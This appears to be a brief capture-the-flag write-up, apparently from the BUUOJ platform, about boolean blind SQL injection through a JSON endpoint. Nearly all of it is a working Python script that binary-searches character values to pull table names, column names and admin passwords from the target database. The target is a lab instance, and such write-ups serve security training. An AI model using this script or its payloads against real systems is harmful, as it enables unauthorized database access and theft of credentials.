json bool盲注

    f12 newwork发现真实请求
    10T@$BN@Y%W2K~)`@@Q$AP6.png

    1. import requests
    2. import time
    4. url = "http://5fa5629d-2f4d-46bd-9037-230d18f89811.node3.buuoj.cn/backend/content_detail.php?id="
    5. proxies = { "http": None, "https": None}
    6. name = ""
    7. i = 0
    8. while True:
    9.     head = 32
    10.     tail = 127
    11.     i += 1
    12.     while head < tail:
    13.         time.sleep(1)
    14.         mid = head + tail >> 1
    15.         # payload = "if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,3,2)" % (i, mid)
    16.         # payload = "if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='contents')),%d,1))>%d,3,2)" % (i, mid)
    17.         payload = "if(ascii(substr((select(group_concat(password))from(admin)),%d,1))>%d,3,2)" % (i, mid)
    19.         r = requests.get(url + payload, proxies=proxies)
    20.         # print(url+payload)
    21.         # print(r.json())
    22.         if "Yunen" in str(r.json()):
    23.             head = mid + 1
    24.         else:
    25.             tail = mid
    26.     if head != 32:
    27.         name += chr(head)
    28.         print(name)
    29.     else:
    30.         break

    /4100adf6,3f9642f7/
    /78b35488,020e36c3/